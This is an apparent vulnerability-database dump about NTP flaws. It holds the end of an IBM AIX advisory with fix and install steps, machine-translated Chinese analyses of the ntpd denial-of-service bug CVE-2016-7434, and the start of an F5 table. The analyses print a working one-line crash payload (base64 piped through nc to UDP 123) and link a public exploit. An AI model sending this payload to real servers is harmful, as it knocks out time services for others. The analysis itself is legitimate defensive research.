NTPv3\n 7.2.0 IV92192 ** SP4 key_w_apar NTPv3\n 7.2.1 IV92067 ** SP2 key_w_apar NTPv3\n\n For NTPv4:\n\n AIX Level APAR Availability SP KEY PRODUCT(S)\n ------------------------------------------------------------\n 6.1.9 IV92287 ** SP9 key_w_apar NTPv4\n 7.1.3 IV92126 ** SP9 key_w_apar NTPv4\n 7.1.4 IV92126 ** SP4 key_w_apar NTPv4\n 7.2.0 IV92126 ** SP4 key_w_apar NTPv4\n 7.2.1 IV92126 ** SP2 key_w_apar NTPv4\n\n ** Please refer to AIX support lifecycle information page for availability\n of Service Packs:\n http://www-01.ibm.com/support/docview.wss?uid=isg3T1012517\n\n Subscribe to the APARs here:\n\n http://www.ibm.com/support/docview.wss?uid=isg1IV91803\n http://www.ibm.com/support/docview.wss?uid=isg1IV91951\n http://www.ibm.com/support/docview.wss?uid=isg1IV92192\n http://www.ibm.com/support/docview.wss?uid=isg1IV92287\n http://www.ibm.com/support/docview.wss?uid=isg1IV92126\n http://www.ibm.com/support/docview.wss?uid=isg1IV92194\n http://www.ibm.com/support/docview.wss?uid=isg1IV92193\n http://www.ibm.com/support/docview.wss?uid=isg1IV92067\n \n https://www.ibm.com/support/docview.wss?uid=isg1IV91803\n https://www.ibm.com/support/docview.wss?uid=isg1IV91951\n https://www.ibm.com/support/docview.wss?uid=isg1IV92192\n https://www.ibm.com/support/docview.wss?uid=isg1IV92287\n https://www.ibm.com/support/docview.wss?uid=isg1IV92126\n https://www.ibm.com/support/docview.wss?uid=isg1IV92194\n https://www.ibm.com/support/docview.wss?uid=isg1IV92193\n https://www.ibm.com/support/docview.wss?uid=isg1IV92067\n \n By subscribing, you will receive periodic email alerting you\n to the status of the APAR, and a link to download the fix once\n it becomes available.\n\n B. FIXES\n\n Fixes are available.\n\n The fixes can be downloaded via ftp or http from:\n\n ftp://aix.software.ibm.com/aix/efixes/security/ntp_fix8.tar\n http://aix.software.ibm.com/aix/efixes/security/ntp_fix8.tar\n https://aix.software.ibm.com/aix/efixes/security/ntp_fix8.tar \n\n The links above are to a tar file containing this signed\n advisory, interim fixes, and OpenSSL signatures for each interim fix.\n The fixes below include prerequisite checking. This will\n enforce the correct mapping between the fixes and AIX\n Technology Levels.\n\n For NTPv3:\n\n AIX Level Interim Fix (*.Z) KEY PRODUCT(S)\n ----------------------------------------------------------\n 5.3.12.9 IV92194m9a.170113.epkg.Z key_w_fix NTPv3\n 6.1.9.6 IV91803m6a.170112.epkg.Z key_w_fix NTPv3\n 6.1.9.7 IV91803m6a.170112.epkg.Z key_w_fix NTPv3\n 6.1.9.8 IV91803m6a.170112.epkg.Z key_w_fix NTPv3\n 7.1.3.5 IV92193m5a.170112.epkg.Z key_w_fix NTPv3\n 7.1.3.6 IV92193m5a.170112.epkg.Z key_w_fix NTPv3\n 7.1.3.7 IV92193m5a.170112.epkg.Z key_w_fix NTPv3\n 7.1.3.8 IV92193m5a.170112.epkg.Z key_w_fix NTPv3\n 7.1.4.1 IV91951m3a.170113.epkg.Z key_w_fix NTPv3\n 7.1.4.2 IV91951m3a.170113.epkg.Z key_w_fix NTPv3\n 7.1.4.3 IV91951m3a.170113.epkg.Z key_w_fix NTPv3\n 7.2.0.0 IV92192m2a.170112.epkg.Z key_w_fix NTPv3\n 7.2.0.1 IV92192m2a.170112.epkg.Z key_w_fix NTPv3\n 7.2.0.2 IV92192m2a.170112.epkg.Z key_w_fix NTPv3\n 7.2.1.0 IV92067s1a.170112.epkg.Z key_w_fix NTPv3\n 7.2.1.1 IV92067s1a.170112.epkg.Z key_w_fix NTPv3\n\n\n VIOS Level Interim Fix (*.Z) KEY PRODUCT(S)\n -----------------------------------------------------------\n 2.2.4.2x IV91803m6a.170112.epkg.Z key_w_fix NTPv3\n\n \n For NTPv4:\n\n AIX Level Interim Fix (*.Z) KEY PRODUCT(S)\n ----------------------------------------------------------\n 6.1.x IV92287m5a.170113.epkg.Z key_w_fix NTPv4\n 7.1.x IV92126m3a.170106.epkg.Z key_w_fix NTPv4\n 7.2.x IV92126m3a.170106.epkg.Z key_w_fix NTPv4\n \n \n All fixes included are cumulative and address previously\n issued AIX NTP security bulletins with respect to SP and TL. \n\n To extract the fixes from the tar file:\n\n tar xvf ntp_fix8.tar\n cd ntp_fix8\n\n Verify you have retrieved the fixes intact:\n\n The checksums below were generated using the\n \"openssl dgst -sha256 <filename>\" command as the following:\n\n openssl dgst -sha256 filename KEY\n -----------------------------------------------------------------------------------------------------\n 70044311eab50e798b1a0756b8f7fef368b65ae79c03496c1fbcf5ba8da7b176 IV91803m6a.170112.epkg.Z key_w_csum\n 8ef346dbd1d7f3d8e9c03b21fa6e2cd1dca88de9d0951675a4787f34bf892f30 IV91951m3a.170113.epkg.Z key_w_csum\n f6105a97e957651e8a464cfd6edd0ad50a74ba9dffb974925612f68d21fa7857 IV92192m2a.170112.epkg.Z key_w_csum\n f1ab705600cc8b08dd11a6e12d1b32a2ec89b988557502ffffd6c06dd53936b9 IV92287m5a.170113.epkg.Z key_w_csum\n 57c9db9c53098f21e837a407e2b2dead1c1c754d44812eb0392d050e697ae2bd IV92126m3a.170106.epkg.Z key_w_csum\n f8d9c43a2ae724a7a1e69caab5973aed0bb4b6ddc72bc57d038fad6faa680fa1 IV92194m9a.170113.epkg.Z key_w_csum\n 558db7a325e5d6733bac66f9b01a9dee4a93826163a50992ee99c1cb9f7dfe70 IV92193m5a.170112.epkg.Z key_w_csum\n eee9aec25443fa496168f7c4cfb289dbfaeed96c8be0fc3cb57b888733e4f9d4 IV92067s1a.170112.epkg.Z key_w_csum\n\n \n These sums should match exactly. The OpenSSL signatures in the tar\n file and on this advisory can also be used to verify the\n integrity of the fixes. If the sums or signatures cannot be\n confirmed, contact IBM AIX Security at\n security-alert@austin.ibm.com and describe the discrepancy.\n \n openssl dgst -sha1 -verify <pubkey_file> -signature <advisory_file>.sig <advisory_file>\n\n openssl dgst -sha1 -verify <pubkey_file> -signature <ifix_file>.sig <ifix_file>\n\n Published advisory OpenSSL signature file location:\n \n http://aix.software.ibm.com/aix/efixes/security/ntp_advisory8.asc.sig\n https://aix.software.ibm.com/aix/efixes/security/ntp_advisory8.asc.sig\n ftp://aix.software.ibm.com/aix/efixes/security/ntp_advisory8.asc.sig \n\n C. FIX AND INTERIM FIX INSTALLATION\n\n IMPORTANT: If possible, it is recommended that a mksysb backup\n of the system be created. Verify it is both bootable and\n readable before proceeding.\n\n The fix will not take affect until any running xntpd servers\n have been stopped and restarted with the following commands:\n\n stopsrc -s xntpd\n startsrc -s xntpd\n\n To preview a fix installation:\n\n installp -a -d fix_name -p all # where fix_name is the name of the\n # fix package being previewed.\n To install a fix package:\n\n installp -a -d fix_name -X all # where fix_name is the name of the\n # fix package being installed.\n\n After installation the ntp daemon must be restarted:\n\n stopsrc -s xntpd\n startsrc -s xntpd\n\n Interim fixes have had limited functional and regression\n testing but not the full regression testing that takes place\n for Service Packs; however, IBM does fully support them.\n\n Interim fix management documentation can be found at:\n\n http://www14.software.ibm.com/webapp/set2/sas/f/aix.efixmgmt/home.html\n\n To preview an interim fix installation:\n\n emgr -e ipkg_name -p # where ipkg_name is the name of the\n # interim fix package being previewed.\n\n To install an interim fix package:\n\n emgr -e ipkg_name -X # where ipkg_name is the name of the\n # interim fix package being installed.\n\n WORKAROUNDS AND MITIGATIONS:\n\n None.\n\n\n===============================================================================\n\nCONTACT US:\n\n Note: Keywords labeled as KEY in this document are used for parsing\n purposes.\n\n If you would like to receive AIX Security Advisories via email,\n please visit \"My Notifications\":\n\n http://www.ibm.com/support/mynotifications\n https://www.ibm.com/support/mynotifications\n\n To view previously issued advisories, please visit:\n\n http://www14.software.ibm.com/webapp/set2/subscriptions/onvdq\n https://www14.software.ibm.com/webapp/set2/subscriptions/onvdq\n \n Comments regarding the content of this announcement can be\n directed to:\n\n security-alert@austin.ibm.com\n\n To obtain the OpenSSL public key that can be used to verify the\n signed advisories and ifixes:\n\n Download the key from our web page:\n\n http://www.ibm.com/systems/resources/systems_p_os_aix_security_pubkey.txt\n https://www.ibm.com/systems/resources/systems_p_os_aix_security_pubkey.txt\n\n To obtain the PGP public key that can be used to communicate\n securely with the AIX Security Team via security-alert@austin.ibm.com you\n can either:\n\n A. Download the key from our web page:\n\nhttp://www.ibm.com/systems/resources/systems_p_os_aix_security_pgppubkey.txt\nhttps://www.ibm.com/systems/resources/systems_p_os_aix_security_pgppubkey.txt\n\n\n B. Download the key from a PGP Public Key Server. The key ID is:\n\n 0x28BFAA12\n\n Please contact your local IBM AIX support center for any\n assistance.\n\n\nREFERENCES:\n \n Complete CVSS v3 Guide: http://www.first.org/cvss/user-guide\n https://www.first.org/cvss/user-guide\n On-line Calculator v3:\n http://www.first.org/cvss/calculator/3.0\n https://www.first.org/cvss/calculator/3.0\n\n\n\nACKNOWLEDGEMENTS:\n\n None \n\n\nCHANGE HISTORY:\n\n First Issued: Mon Feb 13 15:32:47 CST 2017\n Updated:Fri Feb 17 18:40:29 CST 2017\n Update: New iFixes provided for NTPv3 in AIX 5.3.12.9,6.1.9.6,\n 6.1.9.8,7.1.3.5,7.1.3.6,7.1.3.7,7.1.3.8,7.1.4.3,7.2.0.0,7.2.0.2\n 7.2.1.0,7.2.1.1 and VIOS 2.2.4.x.\n| Updated: Mon Oct 2 10:47:12 CDT 2017\n| Update 2: Removed bos.net.tcp.ntp from the impacted fileset list for\n| AIX 7200-01-02. Fileset bos.net.tcp.ntpd is still listed as impacted\n| for AIX 7200-01-02.\n\n===============================================================================\n\n*The CVSS Environment Score is customer environment specific and will \nultimately impact the Overall CVSS Score. Customers can evaluate the impact \nof this vulnerability in their environments by accessing the links in the \nReference section of this Security Bulletin. \n\nDisclaimer\nAccording to the Forum of Incident Response and Security Teams (FIRST), the \nCommon Vulnerability Scoring System (CVSS) is an \"industry open standard \ndesigned to convey vulnerability severity and help to determine urgency and \npriority of response.\" IBM PROVIDES THE CVSS SCORES \"AS IS\" WITHOUT WARRANTY \nOF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS \nFOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT \nOF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n \n\n\n\n\n\n\n", "edition": 25, "modified": "2017-10-02T10:47:12", "published": "2017-02-13T15:32:47", "id": "NTP_ADVISORY8.ASC", "href": "https://aix.software.ibm.com/aix/efixes/security/ntp_advisory8.asc", "title": "There are multiple vulnerabilities in NTPv3 and NTPv4 that impact AIX.", "type": "aix", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}], "myhack58": [{"lastseen": "2016-12-03T17:44:13", "bulletinFamily": "info", "cvelist": ["CVE-2016-7434", "CVE-2016-9311"], "edition": 1, "description": "Foreword\n\nRecently this period of time, the NTP doing things, and a lot of safe media also reported that many NTP vulnerabilities are very interesting, NTP is a Network Time Protocol, used to synchronize between the various computers of the time, there are some[DDoS](<http://www.myhack58.com/Article/60/sort096/Article_096_1.htm>)is the use of NTP amplification attacks. Similarly, this period of time a continuous burst of a plurality of NTP denial of service vulnerability, this vulnerability can cause the NTP service, or even the NTP server denial of service, prior to the Freebuf above had an article about Windows NTP denial of service vulnerability reported.\n\nhttp://www.freebuf.com/vuls/121129.html\n\nSpeaking of Windows under an NTP denial of service vulnerability CVE-2016-9311, later I'm in the CNVD also saw an article of the Bulletin on NTP denial of service vulnerability.\n\nhttp://www.cnvd.org.cn/webinfo/show/3992\n\nAnd I selected one of the Linux NTP denial of service vulnerability CVE-2016-7434 to make a full analysis of this vulnerability in the reproduction process of discovery does not require any set can be achieved by the exploit of the effect, and, of course, in the ntp. org11 on the release of the latest version 4. 2. 8p9 fixes this vulnerability, and 4. 2. 8p8 is affected by this vulnerability.\n\nThe NTP Protocol Analysis with CVE-2016-7434\n\nAbout the client and the NTP server, the NTP Protocol interaction, the synchronous time of process I is no longer described in detail, with a pair of figure can be a brief description of the time synchronization process, in this process, the data take the NTP Protocol transmission, and the interaction with the server port is 123 port.\n\n! [](/Article/UploadPic/2016-12/2016123154243294. png)\n\nOur download NTP-4.2. 8p8, by tar after decompression, with configure, make and make install to install, after installation, by./ ntpd-n-c [ntp. conf path]the method run ntpd, many Linux system comes with NTP, you need to switch to the NTPD directory implementation the directory of the NTP to ensure that the version is the problematic version.\n\n! [](/Article/UploadPic/2016-12/2016123154243887. png)\n\nWe take a look at the NTP Protocol format.\n\n! [](/Article/UploadPic/2016-12/2016123154243576. png)\n\nAbout the NTP Protocol each field of meanings, online are explained, here I will not repeat them here, in the middle of this that relates to one Mode, it represents the work mode, here it is worth mentioning that in previous NTP Protocol, usually with the Mode7 of the monlist feature to respond to NTP requests, but due to the monlist vulnerability exists that can exploit this vulnerability to NTP amplification attack, which is[DDoS](<http://www.myhack58.com/Article/60/sort096/Article_096_1.htm>), and later monlist feature is disabled, is changed Mode6 the mrulist characteristics, in order to avoid NTP amplification attacks, while this vulnerability is due to the mrulist.\n\nWe by CVE-2016-7434 the Payload to send a malformed packet, while packet capture analysis data.\n\n! [](/Article/UploadPic/2016-12/2016123154243705.jpg)\n\nYou can see, the first byte is 16, convert to binary is 00010110, according to the Before for the NTP Protocol format of the analysis, the 0 and 1 bits represent the Leap Indicator when the value is 11 when the alarm state representing the time synchronization problem, the other is not processed, here is 00; then 2, 3, 4 bits are 010, representing the IS version, after the 5 -, 6 -, and 7-bit 110 represents the is Mode, here it is 6, representing the mrulist characteristics of the process.\n\nCVE-2016-7434 vulnerability analysis\n\nWe under Linux with gdb attach method to attach ntpd, send a payload after a gdb capture to ntpd to crash.\n\n/Article/UploadPic/2016-12/2016123154243426. png\n\nThrough the bt command, back it out before the collapse of the stack call\n\n__strlen_sse2_bsf () at ../sysdeps/i386/i686/multiarch/strlen-sse2-bsf. S:50\n\n50../sysdeps/i386/i686/multiarch/strlen-sse2-bsf. S: No such file or directory.\n\n(gdb) bt\n\n#0 __strlen_sse2_bsf () at ../sysdeps/i386/i686/multiarch/strlen-sse2-bsf. S:50\n\n#1 0x080948f0 in estrdup_impl (str=0x0) at emalloc. c:128\n\n#2 0x0805f9b3 in read_mru_list (rbufp=0x89d3dd8, restrict_mask=0)\n\nat ntp_control. c:4041\n\n#3 0x0806a694 in receive (rbufp=0x89d3dd8) at ntp_proto. c:659\n\n#4 0x080598f7 in ntpdmain (argc=0, argv=0xbff16c94) at ntpd. c:1329\n\n#5 0x0804af9b in main (argc=4, argv=0xbff16c84) at ntpd. c:392\n\nYou can see that in the#1 Position call emalloc. c estrdup_impl, the parameter str value is 0x0, a direct look at the emalloc. c in the corresponding portion of the code.\n\nchar *\n\nestrdup_impl(\n\nconst char *str\n\n#ifdef EREALLOC_CALLSITE\n\n,\n\nconst char *file,\n\nintline\n\n#endif\n\n)\n\n{\n\nchar *copy;\n\nsize_tbytes;\n\nbytes = strlen(str) + 1;\n\nHere if the str value is 0x0, then, in the strlen will read the 0x0 address of the location to store the value of length, this location is unreadable.\n\ngdb-peda$ x/10x 0x0\n\n**[1] [[2]](<81716_2.htm>) [[3]](<81716_3.htm>) [[4]](<81716_4.htm>) [[5]](<81716_5.htm>) [next](<81716_2.htm>)**\n", "modified": "2016-12-03T00:00:00", "published": "2016-12-03T00:00:00", "href": "http://www.myhack58.com/Article/html/3/62/2016/81716.htm", "id": "MYHACK58:62201681716", "type": "myhack58", "title": "Doing things the NTP----CVE-2016-7434 vulnerability analysis-vulnerability warning-the black bar safety net", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2016-12-17T15:12:07", "bulletinFamily": "info", "cvelist": ["CVE-2016-7434"], "edition": 1, "description": "Author: LJ, dawu (know Chong Yu 404 laboratory)\n\n## Preface\n\nNTP service for the Internet is essential, many things can and it linked together. Not so long ago, the sensational Germany off the network the event also appeared in its shadow. Ensure the NTP server's security is very important!\n\n## 0x00 vulnerability overview\n\n### 1. Vulnerability description\n\nNTPD is a linux system synchronized to a different time of the machine's service program. \nRecently the NTP. org published a denial of service vulnerability can cause the NTPD service is subjected to a remote DoS attack.\n\n### 2. Vulnerability\n\nThe affected versions are facing a DoS attack risk\n\n### 3. Impact version\n\n* 4.3.90\n* 4.3.25\n* 4.3\n* 4.3.93\n* 4.3.92\n* 4.3.77\n* 4.3.70\n* 4.2. 8p8\n* 4.2. 8p7\n* 4.2. 8p6\n* 4.2. 8p5\n* 4.2. 8p4\n* 4.2. 8p3\n* 4.2. 8p2\n* 4.2. 8p1\n* 4.2. 7p22\n\n## 0x01 vulnerability details\n\n### Vulnerability details\n\nThe NTPD service-side configuration low security, can be received on either end of the mrulist data packet. In this case the attacker is able to remotely transmit through the structure of the mrulist data package to Dos attacks.\n\n### Vulnerability detection method\n\nUse the following command to detect the NTP version: # ntpq-c version to the affected versions list of versions is not related to the security configuration will be affected by the vulnerability. github has published the exploit poc, but the poc will enable the NTPD service crashes, the use after the need to restart the service. \n[Exploit poc](<https://github.com/opsxcq/exploit-CVE-2016-7434/blob/master/exploit.py>)\n\n### Vulnerability reproduction\n\ndocker build environment:\n\n\ndocker run --rm-it --name ntpvulnerable-p 123:123/udp vulnerables/cve-2016-7434 \n\n\n! [](/Article/UploadPic/2016-12/20161217105154360. png)after the command line input:\n\n\necho \"FgoAEAAAAAAAAAA2bm9uY2UsIGxhZGRypvtdokhyywdzptmylcbsywrkcj1bxtpxt1aamiwgbgfkzhi9w106v09qaaa=\" | base64-d | nc-u-v 127.0.0.1 123 \n\n\nFinally, the NTPD service crashes! [](/Article/UploadPic/2016-12/20161217105155656. png)! [](/Article/UploadPic/2016-12/20161217105155555. png)\n\n### Vulnerability analysis\n\n#### payload analysis\n\nVulnerability discoverer is constructed so that a period of mrulist data packet\n\n\nFgoAEAAAAAAAAAA2bm9uY2UsIGxhZGRypvtdokhyywdzptmylcbsywrkcj1bxtpxt1aamiwgbgfkzhi9w106v09qaaa= \n\n\nbase64 decoded to:\n\n! [base64. png](/Article/UploadPic/2016-12/20161217105155515. png)\n\nbase64 decoding for 16-ary display\uff09\uff1a\n\n\n\\x16 \\x0a \\x00 \\x10 \\x00 \\x00 \\x00 \\x00 \n\\x00 \\x00 \\x00 \\x36 \\x6e \\x6f \\x6e \\x63 \n\\x65 \\x2c \\x20 \\x6c \\x61 \\x64 \\x64 \\x72 \n\\x3d \\x5b \\x5d \\x3a \\x48 \\x72 \\x61 \\x67 \n\\x73 \\x3d \\x33 \\x32 \\x2c \\x20 \\x6c \\x61 \n\\x64 \\x64 \\x72 \\x3d \\x5b \\x5d \\x3a \\x57 \n\\x4f \\x50 \\x00 \\x32 \\x2c \\x20 \\x6c \\x61 \n\\x64 \\x64 \\x72 \\x3d \\x5b \\x5d \\x3a \\x57 \n\\x4f \\x50 \\x00 \\x00 \n\n\nHere the reference NTP Protocol format:\n\nThe NTP packet = NTP header + Four TimeStamps = 48byte\n\nNTP header : 16byte\n\n| LI(LeapYearIndicator) | VN(VersionNumber) | Mode | Stratum | Poll(PollInterval) | Precision \n---|---|---|---|---|--- \n2bit | 3bit | 3bit | 8bit | 8bit | 8bit \n\nFor details, see [NTP packet format](<http://support.ntp.org/bin/view/Support/DraftRfc2030>)\n\n> The main fields are explained as follows: \u00b7LI\uff08Leap Indicator, leap second hint: a length of 2 bits, a value of\u201c11\u201dindicates the alarm state, the clock is not synchronized. For other values of the NTP itself does not do the processing. \u00b7VN\uff08Version Number, the version number: the length is 3 bits, indicating the NTP version number, currently the latest version is 4. \u00b7Mode: a length of 3 bits, indicates the NTP mode. Different values of the representation of the meaning are: 0 undefined and 1 represents the active peer mode, 2 represents the passive peer mode, the 3 indicates the client mode, the 4 indicates the server mode, 5 indicates a broadcast mode or a multicast mode, the 6 indicates that this packet is the NTP control messages 7 reserved for internal use. \u00b7Stratum: the system clock of the layer number, the value range is 1 to 16, which defines the clock accuracy. The number of layers is 1 The clock of the highest accuracy, the accuracy is from 1 to 16 in descending order, the number of layers is 16 clock is in unsynchronized state. \u00b7Poll: polling time, i.e., two successive NTP packets between the time interval. \u00b7Precision: the system clock accuracy.\n\nTo understand the NTP packet format, the above data packet in the NTP header:\n\n\n\\x16 \\x0a \\x00 \\x10 \\x00 \\x00 \\x00 \\x00\n\\x00 \\x00 \\x00 \\x36 \\x6e \\x6f \\x6e \\x63\n\n\npayload analysis here temporarily without the following, so we turn to the study of the vulnerability of the trigger point portion of the\n\n#### Vulnerability trigger point analysis\n\nThe following figure, we according to valgrind the given debug information to find vulnerabilities trigger point! [](/Article/UploadPic/2016-12/20161217105155180. png)\n\nDetermine the vulnerability of the trigger point is located in the ntpd/ntpcontrol. c:4041, the readmru_list()function in vivo! [](/Article/UploadPic/2016-12/20161217105155932. png)\n\n**[1] [[2]](<82160_2.htm>) [next](<82160_2.htm>)**\n", "modified": "2016-12-17T00:00:00", "published": "2016-12-17T00:00:00", "id": "MYHACK58:62201682160", "href": "http://www.myhack58.com/Article/html/3/62/2016/82160.htm", "title": "NTPD denial of service vulnerability, CVE-2016-7434 analysis-vulnerability warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2016-12-03T17:43:47", "bulletinFamily": "info", "cvelist": ["CVE-2016-7434"], "edition": 1, "description": "The NTP Protocol Analysis with CVE-2016-7434 \nAbout the client and the NTP server, the NTP Protocol interaction, the synchronous time of process I is no longer described in detail, with a pair of figure can be a brief description of the time synchronization process, in this process, the data take the NTP Protocol transmission, and the interaction with the server port is 123 port. \n! [](/Article/UploadPic/2016-12/2016123165929745. png? www. myhack58. com) \nOur download NTP-4.2. 8p8, by tar after decompression, with configure, make and make install to install, after installation, by./ ntpd-n-c [ntp. conf path]the method run ntpd, many Linux system comes with NTP, you need to switch to the NTPD directory implementation the directory of the NTP to ensure that the version is the problematic version. \n! [](/Article/UploadPic/2016-12/2016123165929951. png? www. myhack58. com) \nWe take a look at the NTP Protocol format. \n! [](/Article/UploadPic/2016-12/2016123165929641. png? www. myhack58. com) \nAbout the NTP Protocol each field of meanings, online are explained, here I will not repeat them here, in the middle of this that relates to one Mode, it represents the work mode, here it is worth mentioning that in previous NTP Protocol, usually with the Mode7 of the monlist feature to respond to NTP requests, but due to the monlist vulnerability exists that can exploit this vulnerability to NTP amplification attack, which is[DDoS](<http://www.myhack58.com/Article/60/sort096/Article_096_1.htm>), and later monlist feature is disabled, is changed Mode6 the mrulist characteristics, in order to avoid NTP amplification attacks, while this vulnerability is due to the mrulist. \nWe by CVE-2016-7434 the Payload to send a malformed packet, while packet capture analysis data. \n! [](/Article/UploadPic/2016-12/2016123165929436.jpg) \nYou can see, the first byte is 16, convert to binary is 00010110, according to the Before for the NTP Protocol format of the analysis, the 0 and 1 bits represent the Leap Indicator when the value is 11 when the alarm state representing the time synchronization problem, the other is not processed, here is 00; then 2, 3, 4 bits are 010, representing the IS version, after the 5 -, 6 -, and 7-bit 110 represents the is Mode, here it is 6, representing the mrulist characteristics of the process. \nCVE-2016-7434 vulnerability analysis\nWe under Linux with gdb attach method to attach ntpd, send a payload after a gdb capture to ntpd to crash. \n! [](/Article/UploadPic/2016-12/2016123165929156. png? www. myhack58. com) \nThrough the bt command, back it out before the collapse of the stack call\n__strlen_sse2_bsf () at ../sysdeps/i386/i686/multiarch/strlen-sse2-bsf. S:50 \n50../sysdeps/i386/i686/multiarch/strlen-sse2-bsf. S: No such file or directory. \n(gdb) bt \n#0 __strlen_sse2_bsf () at ../sysdeps/i386/i686/multiarch/strlen-sse2-bsf. S:50 \n#1 0x080948f0 in estrdup_impl (str=0x0) at emalloc. c:128 \n#2 0x0805f9b3 in read_mru_list (rbufp=0x89d3dd8, restrict_mask=0) \nat ntp_control. c:4041 \n#3 0x0806a694 in receive (rbufp=0x89d3dd8) at ntp_proto. c:659 \n#4 0x080598f7 in ntpdmain (argc=0, argv=0xbff16c94) at ntpd. c:1329 \n#5 0x0804af9b in main (argc=4, argv=0xbff16c84) at ntpd. c:392 \nYou can see that in the#1 Position call emalloc. c estrdup_impl, the parameter str value is 0x0, a direct look at the emalloc. c in the corresponding portion of the code. \nchar * \nestrdup_impl( \nconst char *str \n#ifdef EREALLOC_CALLSITE \n, \nconst char *file, \nintline \n#endif \n) \n{ \nchar *copy; \nsize_tbytes; \nbytes = strlen(str) + 1; \nHere if the str value is 0x0, then, in the strlen will read the 0x0 address of the location to store the value of length, this location is unreadable. \ngdb-peda$ x/10x 0x0 \n0x0: Cannot access memory at address 0x0 \nThus causing a denial of service occurs, in estrdup_impl before the call, the call to read_mru_list, this function is processing mrulist properties of the function, in this function call before the ntpdmain and receive function for receiving. \nTake a look at read_mru_list processing mrulist characteristic function of the content, in ntp_control. c in the first 4034. \nwhile (NULL != (v = ctl_getitem(in_parms, &val)) && \n! (EOV & v->flags)) { \nint si; \nif (! strcmp(nonce_text, v->text)) { \nif (NULL != pnonce) \nfree(pnonce); \npnonce = estrdup(val); \nHere in the pnonce variable assignment position called estrdup, that is, a problem occurs in the function call, then the val's value is 0x0, the tracking read_mru_list, found in the function at the entrance declared the val variable after the while loop entry, and calls ctl_getitem function, where val as a parameter, after that estrdup function call, that is, ctl_getitem function, the val variable assignment. \nTake a look at ctl_getitem a function of the content. \n/* \n* ctl_getitem - get the next data item from the incoming packet \n*/ \nstatic const struct ctl_var * \nctl_getitem( \nconst struct ctl_var *var_list, \nchar **data \n) \nctl_getitem a function of the content is from data packet to obtain the next block of data content, wherein the data value is what we care about val values, we dynamically track The bit val value acquisition process. First, in read_mru_list processing mrulist characteristic function of the logic entry under the Breakpoints tracing. \nAt the function Entrance, the first of May in the data packet to obtain the block name assignment. \nconst charnonce_text[] =\"nonce\"; \nconst charfrags_text[] =\"frags\"; \nconst charlimit_text[] =\"limit\"; \n\n\n**[1] [[2]](<81749_2.htm>) [[3]](<81749_3.htm>) [[4]](<81749_4.htm>) [next](<81749_2.htm>)**\n", "modified": "2016-12-03T00:00:00", "published": "2016-12-03T00:00:00", "href": "http://www.myhack58.com/Article/html/3/62/2016/81749.htm", "id": "MYHACK58:62201681749", "type": "myhack58", "title": "Doing things the NTP----CVE-2016-7434 vulnerability analysis-vulnerability warning-the black bar safety net", "cvss": {"score": 0.0, "vector": "NONE"}}], "f5": [{"lastseen": "2017-06-08T00:16:02", "bulletinFamily": "software", "cvelist": ["CVE-2016-9312", "CVE-2015-8138", "CVE-2016-7433", "CVE-2016-7427", "CVE-2016-7429", "CVE-2016-7428", "CVE-2016-7431"], "edition": 1, "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP AAM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP AFM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP Analytics| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP APM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP ASM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP DNS| None| 12.0.0 - 12.1.2| Not vulnerable| None \nBIG-IP Edge Gateway| None| 11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP GTM| None| 11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP Link Controller| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP PEM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP PSM| None| 11.4.0 - 11.4.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP WebAccelerator| None| 11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP WebSafe| None| 12.0.0 - 12.1.2 \n11.6.0 - 11.6.1| Not vulnerable| None \nARX| None| 6.2.0 - 6.4.0| Not vulnerable| None \nEnterprise Manager| None| 3.1.1| Not vulnerable| None \nBIG-IQ Cloud| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Device| None| 4.2.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Security| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ ADC| None| 4.5.0| Not vulnerable| None \nBIG-IQ Centralized Management| None| 5.0.0 - 5.1.0 \n4.6.0| Not vulnerable| None \nBIG-IQ Cloud and Orchestration| None| 1.0.0| Not vulnerable| None \nF5 iWorkflow| None| 2.0.0 - 2.0.2| Not vulnerable| None \nLineRate| None| 2.5.0 - 2.6.1| Not vulnerable| None \nTraffix SDC| None| 5.0.0 - 5.1.0 \n4.0.0 - 4.4.0| Not vulnerable| None\n\nNone\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix 